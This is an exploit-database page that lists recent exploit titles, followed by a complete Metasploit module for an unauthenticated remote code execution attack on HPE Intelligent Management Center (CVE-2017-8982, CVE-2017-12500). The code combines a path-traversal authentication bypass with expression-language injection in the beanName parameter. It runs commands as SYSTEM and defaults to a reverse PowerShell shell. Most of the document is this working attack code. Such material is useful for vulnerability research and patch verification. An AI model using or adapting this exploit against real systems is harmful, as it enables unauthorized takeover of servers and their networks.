41ea196761
12 changes to exploits/shellcodes Microsoft Edge - 'Array.filter' Info Leak Microsoft Edge - 'Array.filter' Information Leak Microsoft Edge Chakra JIT - Bound Check Elimination Bug Windows - Local Privilege Escalation Windows WMI - Recieve Notification Exploit (Metasploit) Microsoft Windows - Local Privilege Escalation Microsoft Windows WMI - Recieve Notification Exploit (Metasploit) Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC) Prime95 29.4b8 - Stack Buffer Overflow (SEH) DynoRoot DHCP - Client Command Injection Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit) Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) HPE iMC 7.3 - Remote Code Execution (Metasploit) Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Monstra CMS before 3.0.4 - Cross-Site Scripting SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery Cisco SA520W Security Appliance - Path Traversal SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
115 lines
No EOL
4 KiB
Ruby
Executable file
115 lines
No EOL
4 KiB
Ruby
Executable file
# Exploit Title: HPE iMC EL Injection Unauthenticated RCE
|
|
# Date: 6 February, 2018
|
|
# Exploit Author: TrendyTofu
|
|
# Vendor Homepage: https://www.hpe.com/us/en/home.html
|
|
# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535
|
|
# Version: prior to 7.3 E0504P04
|
|
# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)
|
|
# CVE : CVE-2017-8982, CVE-2017-12500
|
|
# Reference:
|
|
https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch
|
|
|
|
Metasploit module also hosted on Github. Posted below for reference:
|
|
https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb
|
|
|
|
|
|
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'HPE iMC EL Injection Unauthenticated RCE',
|
|
'Description' => %q{
|
|
This module exploits an expression language injection
|
|
vulnerablity, along with
|
|
an authentication bypass vulnerability in Hewlett Packard
|
|
Enterprise Intelligent
|
|
Management Center before version 7.3 E0504P04 to achieve
|
|
remote code execution.
|
|
|
|
The HP iMC server suffers from multiple vulnerabilities allows
|
|
unauthenticated
|
|
attacker to execute arbitrary Expression Language via the
|
|
beanName parameter,
|
|
allowing execution of arbitrary operating system commands as
|
|
SYSTEM. This service
|
|
listens on TCP port 8080 and 8443 by default.
|
|
|
|
This module has been tested successfully on iMC PLAT v7.3
|
|
(E0504P02) on Windows
|
|
2k12r2 x64 (EN).
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'mr_me', # Discovery
|
|
'trendytofu' # Metasploit
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2017-8982'],
|
|
['ZDI', '18-139'],
|
|
['URL',
|
|
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],
|
|
['CVE', '2017-12500'],
|
|
['ZDI', '17-663'],
|
|
['URL',
|
|
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']
|
|
],
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [
|
|
[ 'Windows',
|
|
{
|
|
'Arch' => [ ARCH_CMD],
|
|
'Platform' => 'win'
|
|
}
|
|
]
|
|
],
|
|
'Privileged' => true,
|
|
'DisclosureDate' => 'Jan 25 2018',
|
|
'DefaultOptions' =>
|
|
{
|
|
'Payload' => 'cmd/windows/reverse_powershell'
|
|
},
|
|
'DefaultTarget' => 0))
|
|
register_options [Opt::RPORT(8080)]
|
|
end
|
|
|
|
def check
|
|
res = send_request_raw({'uri' => '/imc/login.jsf' })
|
|
|
|
return CheckCode::Detected if res && res.code == 200
|
|
|
|
CheckCode::Unknown
|
|
end
|
|
|
|
def get_payload(cmd)
|
|
%q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|
|
|
end
|
|
|
|
def execute_command(payload)
|
|
res = send_request_raw({ 'uri' =>
|
|
"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}"
|
|
})
|
|
fail_with(Msf::Module::Failure::UnexpectedReply, "Injection
|
|
failed") if res && res.code != 302
|
|
print_good "Command injected successfully!"
|
|
end
|
|
|
|
def exploit
|
|
cmd = payload.encoded
|
|
cmd.gsub!('cmd.exe /c ','')
|
|
cmd = Rex::Text.uri_encode(cmd)
|
|
|
|
print_status "Sending payload..."
|
|
execute_command get_payload cmd
|
|
end
|
|
end |